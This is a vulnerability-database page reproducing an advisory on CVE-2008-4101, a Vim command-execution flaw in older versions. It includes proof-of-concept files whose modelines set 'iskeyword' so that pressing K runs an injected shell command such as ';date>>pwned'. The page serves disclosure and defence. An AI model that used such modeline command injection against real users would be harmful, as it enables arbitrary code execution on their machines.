Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2008-4101

Publish Date: 19 Aug 2008

                							

                source: http://www.securityfocus.com/bid/30795/info

Vim is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data.

Successfully exploiting these issues can allow an attacker to execute arbitrary commands with the privileges of the user running the affected application.

Versions prior to Vim 7.2.010 are vulnerable. 

Copy-and-paste these examples into separate files:

;xclock
vim: set iskeyword=;,@

Place your cursor on ``xclock'', and press K. xclock appears.

;date&gt;&gt;pwned
vim: set iskeyword=1-255

Place your cursor on ``date'' and press K. File ``pwned'' is created in
the current working directory.

Please note: If modeline processing is disabled, set the 'iskeyword'
option manually.

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Vim 7.1.314 - Insufficient Shell Escaping Multiple Command Execution Vulnerabilities

Vulmon Search

About

Products

Connect